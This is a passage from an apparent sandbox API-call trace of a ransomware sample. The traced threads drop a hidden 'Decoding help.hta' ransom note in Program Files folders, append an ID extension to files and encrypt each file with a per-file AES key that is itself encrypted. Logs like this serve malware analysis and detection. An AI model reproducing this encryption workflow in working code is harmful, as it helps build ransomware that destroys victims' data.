ftLastWriteTime.dwLowDateTime=0xfd77a70c, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0057.104] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0057.104] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0057.104] FindNextFileW (in: hFindFile=0x5db8b8, lpFindFileData=0x1f61fd30 | out: lpFindFileData=0x1f61fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe728fcf7, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe74cb16a, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe74cb16a, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0057.104] lstrcpyW (in: lpString1=0x24a06028, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE\\*.*" [0057.104] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE\\*.*") returned 64 [0057.104] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE\\Decoding help.hta" [0057.104] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\de-de\\decoding help.hta")) returned 0xffffffff [0057.104] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\de-de\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4d8 [0059.034] WriteFile (in: hFile=0x4d8, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x1f61fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x1f61fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0060.504] CloseHandle (hObject=0x4d8) returned 1 [0061.601] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE\\Decoding help.hta", dwFileAttributes=0x1) returned 1 Thread: id = 741 os_tid = 0xfdc [0054.487] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\en_US\\*.*", lpFindFileData=0x1f89fd30 | out: lpFindFileData=0x1f89fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d5a6660, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7d5a6660, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7d5a6660, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a5f70 [0056.143] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0056.143] FindNextFileW (in: hFindFile=0x5a5f70, lpFindFileData=0x1f89fd30 | out: lpFindFileData=0x1f89fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d5a6660, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7d5a6660, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7d5a6660, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0056.143] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0056.143] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0056.143] FindNextFileW (in: hFindFile=0x5a5f70, lpFindFileData=0x1f89fd30 | out: lpFindFileData=0x1f89fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x950fa000, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7d5a6660, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x950fa000, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x158, dwReserved0=0x0, dwReserved1=0x0, cFileName="Reader_10.0.helpcfg", cAlternateFileName="READER~1.HEL")) returned 1 [0056.593] lstrcpyW (in: lpString1=0x25358138, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\en_US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\en_US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\en_US\\*.*" [0056.593] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\en_US\\*.*") returned 63 [0056.593] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\en_US\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\en_US\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\en_US\\Decoding help.hta" [0056.593] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\en_US\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\en_us\\decoding help.hta")) returned 0xffffffff [0056.593] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\en_US\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\en_us\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xa04 [0058.047] WriteFile (in: hFile=0xa04, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x1f89fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x1f89fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0058.048] CloseHandle (hObject=0xa04) returned 1 [0058.048] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\en_US\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0058.048] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Reader_10.0.helpcfg") returned -1 [0058.048] lstrlenW (lpString="Reader_10.0.helpcfg") returned 19 [0058.048] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\en_US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\en_US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\en_US\\*.*" [0058.048] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\en_US\\*.*") returned 63 [0058.048] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\en_US\\", lpString2="Reader_10.0.helpcfg" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\en_US\\Reader_10.0.helpcfg") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\en_US\\Reader_10.0.helpcfg" [0058.048] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\en_US\\Reader_10.0.helpcfg" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\en_US\\Reader_10.0.helpcfg") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\en_US\\Reader_10.0.helpcfg" [0058.048] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\en_US\\Reader_10.0.helpcfg", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\en_US\\Reader_10.0.helpcfg.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\en_US\\Reader_10.0.helpcfg.[ID]g9uZrLhJaygpwRm1[ID]" [0058.048] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\en_US\\Reader_10.0.helpcfg" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\en_us\\reader_10.0.helpcfg"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\en_US\\Reader_10.0.helpcfg.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\en_us\\reader_10.0.helpcfg.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0058.049] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\en_US\\Reader_10.0.helpcfg.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\en_us\\reader_10.0.helpcfg.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xa04 [0058.049] CreateFileMappingA (hFile=0xa04, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xa08 [0058.049] CryptAcquireContextA (in: phProv=0x1f89fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1f89fcec*=0x3449ac8) returned 1 [0060.174] CryptGenKey (in: hProv=0x3449ac8, Algid=0x6610, dwFlags=0x1, phKey=0x1f89fce8 | out: phKey=0x1f89fce8*=0x42cf218) returned 1 [0060.174] CryptExportKey (in: hKey=0x42cf218, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x1f89fbe4, pdwDataLen=0x1f89fce4 | out: pbData=0x1f89fbe4*, pdwDataLen=0x1f89fce4*=0x2c) returned 1 [0060.174] MapViewOfFile (hFileMappingObject=0xa08, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x140) returned 0x3920000 [0063.816] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1f89fbe4*, pdwDataLen=0x1f89fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x1f89fbe4*, pdwDataLen=0x1f89fcf8*=0x100) returned 1 [0063.816] CryptEncrypt (in: hKey=0x42cf218, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3920000*, pdwDataLen=0x1f89fce4*=0x140, dwBufLen=0x140 | out: pbData=0x3920000*, pdwDataLen=0x1f89fce4*=0x140) returned 1 [0063.816] UnmapViewOfFile (lpBaseAddress=0x3920000) Thread: id = 742 os_tid = 0xfe0 [0054.487] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\el-GR\\*.*", lpFindFileData=0x1f99fd30 | out: lpFindFileData=0x1f99fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd77a70c, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd77a70c, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5db4f8 [0059.390] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0059.390] FindNextFileW (in: hFindFile=0x5db4f8, lpFindFileData=0x1f99fd30 | out: lpFindFileData=0x1f99fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd77a70c, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd77a70c, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0059.390] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0059.390] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0059.390] FindNextFileW (in: hFindFile=0x5db4f8, lpFindFileData=0x1f99fd30 | out: lpFindFileData=0x1f99fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe31667d9, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe337baef, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe337baef, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0059.390] lstrcpyW (in: lpString1=0x2ab59180, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\el-GR\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\el-GR\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\el-GR\\*.*" [0059.390] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\el-GR\\*.*") returned 64 [0059.390] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\el-GR\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\el-GR\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\el-GR\\Decoding help.hta" [0059.390] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\el-GR\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\el-gr\\decoding help.hta")) returned 0xffffffff [0059.390] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\el-GR\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\el-gr\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4bc [0060.630] WriteFile (in: hFile=0x4bc, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x1f99fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x1f99fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0060.631] CloseHandle (hObject=0x4bc) returned 1 [0060.631] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\el-GR\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0060.863] lstrcmpiW (lpString1="Decoding help.hta", lpString2="tipresx.dll.mui") returned -1 [0060.863] lstrlenW (lpString="tipresx.dll.mui") returned 15 [0060.863] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\el-GR\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\el-GR\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\el-GR\\*.*" [0060.864] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\el-GR\\*.*") returned 64 [0060.864] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\el-GR\\", lpString2="tipresx.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\el-GR\\tipresx.dll.mui") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\el-GR\\tipresx.dll.mui" [0060.864] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\el-GR\\tipresx.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\el-GR\\tipresx.dll.mui") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\el-GR\\tipresx.dll.mui" [0060.864] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\el-GR\\tipresx.dll.mui", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\el-GR\\tipresx.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\el-GR\\tipresx.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" [0060.864] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\el-GR\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\el-gr\\tipresx.dll.mui"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\el-GR\\tipresx.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\el-gr\\tipresx.dll.mui.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0060.866] FindNextFileW (in: hFindFile=0x5db4f8, lpFindFileData=0x1f99fd30 | out: lpFindFileData=0x1f99fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe31667d9, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe337baef, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe337baef, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0060.866] FindClose (in: hFindFile=0x5db4f8 | out: hFindFile=0x5db4f8) returned 1 Thread: id = 743 os_tid = 0xfe4 [0054.487] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\es_ES\\*.*", lpFindFileData=0x1fa9fd30 | out: lpFindFileData=0x1fa9fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d5cc7c0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7d5cc7c0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7d5cc7c0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x671bb0 [0056.124] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0056.124] FindNextFileW (in: hFindFile=0x671bb0, lpFindFileData=0x1fa9fd30 | out: lpFindFileData=0x1fa9fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d5cc7c0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7d5cc7c0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7d5cc7c0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0056.124] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0056.124] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0056.124] FindNextFileW (in: hFindFile=0x671bb0, lpFindFileData=0x1fa9fd30 | out: lpFindFileData=0x1fa9fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7d5cc7c0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x15d, dwReserved0=0x0, dwReserved1=0x0, cFileName="Reader_10.0.helpcfg", cAlternateFileName="READER~1.HEL")) returned 1 [0056.124] lstrcpyW (in: lpString1=0x11344318, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\es_ES\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\es_ES\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\es_ES\\*.*" [0056.124] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\es_ES\\*.*") returned 63 [0056.124] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\es_ES\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\es_ES\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\es_ES\\Decoding help.hta" [0056.124] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\es_ES\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\es_es\\decoding help.hta")) returned 0xffffffff [0056.124] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\es_ES\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\es_es\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x94c [0057.412] WriteFile (in: hFile=0x94c, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x1fa9fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x1fa9fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0057.412] CloseHandle (hObject=0x94c) returned 1 [0057.413] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\es_ES\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0057.413] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Reader_10.0.helpcfg") returned -1 [0057.413] lstrlenW (lpString="Reader_10.0.helpcfg") returned 19 [0057.413] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\es_ES\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\es_ES\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\es_ES\\*.*" [0057.413] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\es_ES\\*.*") returned 63 [0057.413] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\es_ES\\", lpString2="Reader_10.0.helpcfg" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\es_ES\\Reader_10.0.helpcfg") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\es_ES\\Reader_10.0.helpcfg" [0057.413] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\es_ES\\Reader_10.0.helpcfg" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\es_ES\\Reader_10.0.helpcfg") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\es_ES\\Reader_10.0.helpcfg" [0057.413] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\es_ES\\Reader_10.0.helpcfg", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\es_ES\\Reader_10.0.helpcfg.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\es_ES\\Reader_10.0.helpcfg.[ID]g9uZrLhJaygpwRm1[ID]" [0057.413] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\es_ES\\Reader_10.0.helpcfg" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\es_es\\reader_10.0.helpcfg"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\es_ES\\Reader_10.0.helpcfg.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\es_es\\reader_10.0.helpcfg.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0057.414] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\es_ES\\Reader_10.0.helpcfg.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\es_es\\reader_10.0.helpcfg.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x94c [0057.414] CreateFileMappingA (hFile=0x94c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x950 [0057.414] CryptAcquireContextA (in: phProv=0x1fa9fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1fa9fcec*=0x34492d0) returned 1 [0060.134] CryptGenKey (in: hProv=0x34492d0, Algid=0x6610, dwFlags=0x1, phKey=0x1fa9fce8 | out: phKey=0x1fa9fce8*=0x5db3f8) returned 1 [0060.134] CryptExportKey (in: hKey=0x5db3f8, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x1fa9fbe4, pdwDataLen=0x1fa9fce4 | out: pbData=0x1fa9fbe4*, pdwDataLen=0x1fa9fce4*=0x2c) returned 1 [0060.134] MapViewOfFile (hFileMappingObject=0x950, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x140) returned 0x2d0000 [0060.938] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1fa9fbe4*, pdwDataLen=0x1fa9fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x1fa9fbe4*, pdwDataLen=0x1fa9fcf8*=0x100) returned 1 [0060.938] CryptEncrypt (in: hKey=0x5db3f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2d0000*, pdwDataLen=0x1fa9fce4*=0x140, dwBufLen=0x140 | out: pbData=0x2d0000*, pdwDataLen=0x1fa9fce4*=0x140) returned 1 [0060.938] UnmapViewOfFile (lpBaseAddress=0x2d0000) returned 1 [0060.940] CloseHandle (hObject=0x950) returned 1 [0060.940] CryptDestroyKey (hKey=0x5db3f8) returned 1 [0060.940] CryptReleaseContext (hProv=0x34492d0, 